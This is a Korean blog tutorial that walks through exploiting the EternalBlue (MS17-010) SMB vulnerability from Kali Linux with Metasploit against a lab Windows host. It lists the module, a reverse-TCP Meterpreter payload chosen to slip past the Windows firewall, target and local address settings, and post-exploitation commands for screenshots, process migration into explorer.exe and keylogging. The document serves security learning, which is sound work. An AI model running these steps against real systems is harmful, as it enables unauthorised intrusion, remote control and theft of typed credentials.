Server/보안

Kali Linux - Windows EternalBlue 취약점 공격(Metasploit 이용)

heyoon2j 2019. 7. 10. 20:16

■ EternalBlue 취약점 공격

- EthernalBlue는 Microsoft의 Server Message Block(SMB) 프로토콜 구현의 취약점을 공격한다.

 => 2017년 전 세계 워너크라이 랜섬웨어 공격의 일부로 사용되었다(워너크라이: 랜섬웨어 멀웨어 툴)

- Server Message Block(SMB)는 DOS나 Windows에서 파일이나 디렉터리 및 주변 장치들을 공유하는 데 사용되는 메시지 형식. 즉, 네트워크 상 존재하는 노드들 간에 자원을 공유할 수 있도록 설계된 프로토콜이다.

- Kali Linux의 Metasploit Framework를 이용하여 취약점 공격

 

 

○ Metasploit 이용

- #service postgresql start : 메타스플로잇과 연동되어 사용되는 postgreSQL 서버를 시작시킨다.

- #msfdb init : 처음 켰을 때는 DB를 초기화시켜줘야 한다.

 

- #msfconsole : msfconsole 실행(Metasploit Framework, MSF)

 

1) exploit : 보안취약점을 찾아, 악성코드를 설치하는 역할 수행 [1], 공격을 진행할 때 Platform -> Service -> Code 순으로 선택.

2) auxiliary : Payload를 필요로 하지 않는 단순한 공격에 사용되는 코드. 주로 Scanner 같은 정보수집으로 많이 쓰인다. Type -> Service -> Code 선택

3) post : post-exploitation module로, exploit 성공 후 추가 공격을 위해 정보를 gather(hash, password, tocken 등)하거나 capture (Keylogging 등) 하거나 특별한 기능을 수행하는 코드

4) payload : 설치되는 악성코드

5) encoder : Payload가 IPS(Intrusion Prevention System)에 의해 탐지 되지 않도록 payload의 형태를 변형시키는 기법

 

- msf5 > search eternalblue : eternalblue : 취약점에 해당하는 모듈 검색

 

- msf5 > user exploit/windows/smb/ms17_010_eternalblue : 해당 공격 기법 사용

 => Platform - Windows, Service - SMB, Code - ms17_010_eternalblue 

 

- msf5 > set payload windows/x64/meterpreter/reverse_tcp : payload 설정

meterpreter : 대기하고 있다가 명령어에 따라 동작

reverse_tcp: 리눅스 -> 위도우로 접근하면, 윈도우 방화벽에 접근하기 때문에 막히거나 탐지된다. 그렇기 때문에 윈도우 -> 리눅스 쪽으로 통신을 해서 탐지를 막는다.

 

- Required에 yes라고 표시되어 있는 것은 setting을 해줘야 한다.

- msf5 > show options : option을 보여준다.

 

- set rhost 1.0.0.201 : rhost는 공격 대상의 IP를 설정하면 된다.

- set lhost 1.0.0.200 : lhost는 Local IP를 설정하면 된다.

 

- 성공하면 위와 같이 meterpreter로 바뀐다.

 

- help를 치면 어떤 명령어들이 있는지 알 수 있다.

 

 

1. Screenshot

- screenshot : 현재 화면 캡처

 

- 위와 같이 공격 대상의 화면이 캡처되게 된다.

 

 

2. Ipconfig

- ipconfig 명령어로 네트워크 정보도 확인할 수 있다.

 

 

3. Key Scan

- getpid : PID 출력

 

- explorer.exe에서 사용자 프로그램들이 실행된다. 그렇기 때문에 exeplorer.exe를 Kill하게 되면, 아무것도 할 수 없어서 다시 부팅시켜야 된다.

 

- explorer.exe의 PID를 확인

 

- migrate 1340 : 해당 PID로 PID 변경

 

- keyscan_start : 키보드로 입력하는 정보 저장 시작

 

keyscan_dump : 입력했던 내용 출력 

 

keyscan_stop : keyscan 종료

 

 

 

출처

[1] http://blog.naver.com/PostView.nhn?blogId=aepkoreanet&logNo=221448280456&parentCategoryNo=&categoryNo=1&viewDate=&isShowPopularPosts=true&from=search

'Server > 보안' 카테고리의 다른 글

Kali Linux - 취약점 분석 도구, 명령어(정보 수집 / openvas, nessus, nmap, dig, beef)  (0) 2019.07.22
Kali Linux - SNMP 취약점 공격 (Metasploit 이용)  (0) 2019.07.11
Kali Linux - 악성코드를 이용한 공격(Metasploit 이용)  (0) 2019.07.10
Kali Linux 한글화  (0) 2019.07.10
Kali Linux 설치  (0) 2019.07.10

'Server/보안'의 다른글

  • 현재글Kali Linux - Windows EternalBlue 취약점 공격(Metasploit 이용)

관련글

댓글

티스토리툴바